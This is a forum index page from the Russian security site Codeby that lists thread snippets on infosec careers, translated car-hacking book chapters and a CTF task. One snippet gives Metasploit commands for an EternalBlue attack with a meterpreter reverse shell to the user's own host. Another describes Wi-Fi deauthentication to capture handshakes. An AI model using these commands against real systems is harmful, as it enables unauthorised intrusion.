• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь. Мобильный клиент для IOS находится в itunes по этой ссылке

информационная безопасность

  1. M

    Проблема Не получается реализовать Eternalblue(ms17_010) из Linux.

    Здравствуйте, пользователи форума. Пытаюсь провести атаку Eternalblue с моего VDS. Буду краток. sudo ./msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/meterpreter/reverse_tcp(пробовал с windows/x64/meterpreter/reverce_tcp) set LPORT 7775 set LHOST *public dns* set...
  2. Iain

    Добавление в раздел "Ресурсы" новой категории "Курсы"

    Всем доброго вечера, форумчане! Предлагаю добавить такую категорию, как "Курсы" на форум, где пользователи могли бы делится ссылками на те или иные курсы по ИБ, будь то CEH, Pentestit, Udemy и т.д.
  3. Iain

    В каком возрасте Вы "вошли" в IT- сферу? (Безопасность, разработка, поддержка, дизайн и т.д.)

    Всем доброго вечера Дорогие Читатели! Сегодня решил затронуть такую немаловажную тему, как возраст. Почему возраст спросите Вы, да потому что он, как никто другой дает нам самый важный бонус - это время. Соответственно, чем ты моложе, тем больше у тебя есть шансов "набить шишек" и последствии...
  4. O

    Как грамотно сделать полное тестирование сайта ?

    Вопрос вот в чем, к примеру я создал сайт на Wordpress, Joomla или вообще на самописной админке. И теперь стоит вопрос проверить сайт на различные уязвимости, черный код и т.д. Что бы злоумышленник не смог взломать админку, ни базу данных, ни навредить клиентам. Какие вообще существую методы, и...
  5. AnnaDavydova

    Статья [новость - перевод] После повторного санкционирования раздела 702

    Более десяти лет защитники гражданских прав ведут борьбу с массовой слежкой правительства за невинными американцами через Интернет. Мы только что проиграли важную битву. 18 января президент Трамп подписал обновление раздела 702, и теперь внутреннее массовое наблюдение за гражданами стало...
  6. SmokeDog

    Статья Пожми мне руку!!! - Или перехват рукопожатия

    Хелло всем!!! Думаю многие знают про рукопожатие(это момент когда пользователь подключаеться к сети) И суть получения рукопожатия заключаеться в том, чтобы сначала провести DoS атаку на сеть для отключения клиентов, а потом включаеться анализатор трафика и позже ваш ноутбук/пк становиться...
  7. yarr

    Статья Информационная безопасность и защита информации на предприятии

    Приветствую всех! Дисклеймер: тут возникла небольшая потребность восполнить пробелы по профориентации посетителей форума, решил помочь в силу своих возможностей, статья не является истиной в последней инстанции, так что попрошу дополнить тему людей с опытом работы в сфере защиты...
  8. Sengoku

    Информационная безопасность

    Врываются ко мне родители в комнату и говорят : - ****, тебе 74 года, где дети ? Сначала я удивился, да и потом тоже, меня даже на сессии такими вопросами не заваливали. Отвечаю, пусть в шкафу посмотрят, по карманам полазят, может там оставили. По взглядам понял что ответ неверный и быстро...
  9. V

    Весьма интересный таск в MISK 50

    Просматривал борды разных локальных этапов и наткнулся на задание которое самостоятельно так и не решил. Сам таск: ¡El barco golpeó la tormenta, ayuda a enviar la señal! //bandera sin mayúsculas Кто догадается - напишите куда смотреть пожалуйста. Не могу понять что я упустил в таске за 25...
  10. P

    Статья The Car Hacker's Handbook: A Guide For Penetration Testing(Author: Creig Smith)[ПЕРЕВОД] Глава 3(Часть 2)

    Установка дополнительных модулей ядра Некоторые из более продвинутых и экспериментальных команд, например, основанных на ISO-TP, требуют установки дополнительных модулей ядра, таких как can-isotp, до их использования. На момент написания этой статьи эти дополнительные модули не были включены в...
  11. P

    Статья The Car Hacker's Handbook: A Guide For Penetration Testing(Author: Creig Smith)[ПЕРЕВОД] Глава 3(Часть 1)

    3 Глава.Приступаем к кодингу Когда вы начнете использовать CAN для связи с автомобилем, вы вполне можете найти его как мешанину различных драйверов и программных утилит. Идеальным было бы объединить CAN-инструменты и их различные интерфейсы в общий интерфейс, чтобы мы могли легко обмениваться...
  12. P

    Статья The Car Hacker's Handbook: A Guide For Penetration Testing(Author: Creig Smith)[ПЕРЕВОД] Глава 2(Часть 2)

    Шина Flexray FlexRay - это высокоскоростная шина, которая может поддерживать связь со скоростью до 10 Мбит / с. Он ориентирован на чувствительную по времени связь, такую как проезд, провод по проводам, тормоз-за-провод и т. Д. FlexRay дороже, чем CAN, поэтому большинство реализаций используют...
  13. P

    Статья The Car Hacker's Handbook: A Guide For Penetration Testing(Author: Creig Smith)[ПЕРЕВОД] Глава 2(Часть 1)

    Протокол шины В этой главе мы обсудим различные протоколы шины, общие для транспортных средств. У вашего транспортного средства может быть только один из них, или если он был построен раньше 2000 года, у него может не быть ни одного. Протоколы шины управляют передачей пакетов через сеть вашего...
  14. P

    Статья The Car Hacker's Handbook: A Guide For Penetration Testing(Author: Creig Smith)[ПЕРЕВОД] Глава 1(Часть 2)

    Итак часть 2 Let's go,dude Уровень 1: Приемники Чтобы перейти к диаграмме,показывающая модель угроз уровня 1(рис.1-2),выберите процесс для изучения диаграммы. Поскольку у нас есть только один процесс на нашей диаграмме, давайте вникаем в процесс автомобиля и сосредоточимся на том, что говорит...
  15. P

    Статья The Car Hacker's Handbook: A Guide For Penetration Testing(Author: Creig Smith)[ПЕРЕВОД] Глава 1(Часть 1)

    Let's go. Глава 1(Понимание моделей угроз) Если вы пришли из остального мира программирования в мир тестирования на проникновение, то вы уже знакомы с несколькими принципами проведения атак.При обсуждении атак мы не рассматриваем,как использовать цель; нас беспокоят только точки входы в неё. Вы...
  16. yaroslav2292

    Проблема Как изучать информационную безопасность в Windows?

    Пока что не хочется переходить на Kali Linux(она со мной не особо дружить хочет + на Linux сложно изучать С++, а мне это тоже нужно.) Подскажите, пожалуйста, как изучать лучше всего информационную безопасность в Windows?
  17. Madfatfox

    Проблема Помогите новичку стать кулхоцкером

    Доброго времени суток. На самом деле тема не юмористического характера, а название больше для привлечения внимания =) Начну с небольшого резюме: Учусь на факультете ИБ в одном из ВУЗов дальнего востока, 2й курс. 90% моих одногруппников (как, впрочем и вообще 90% людей которые здесь учатся)...
  18. W

    Проблема Whonix и Windows на виртуальной машине

    Доброго времени форумчане. 3 ночь не сплю(уже зае***). Вообщем нужна рабочая система на Windows(да,да только она).Но на нее должен идти трафик через тор,подхват. ssh,и уже выходить на соксы. На exploit ребята сказали,можно настроить на виртуал бокс Whonix и уже зависимой от нее на виртуал бокс...
  19. W

    Хочу стать специалистом в ИБ

    Доброго времени суток Форумчане! Подскажите пожалуйста направления и что,как,где учить(если можно последовательность) Познания в этой сфере некие имею,но все-же хочется обучиться с 0. Прошу пожалуйста дать развернутый ответ.
  20. 5h3ll

    Поделись знанием с ближним. (Полезно новичкам и гуру)

    Лучшее что нам дала глобальная сеть это способность свободно делиться информацией! Так давайте делиться господа форумчане! И как пологается начну с себя. Есть на гитхабе один репозиторий в котором автор собрал кучу информации книг и прочего на тему ИБ. Не знаю был ли потдобный пост уже, но я...
Вверх Снизу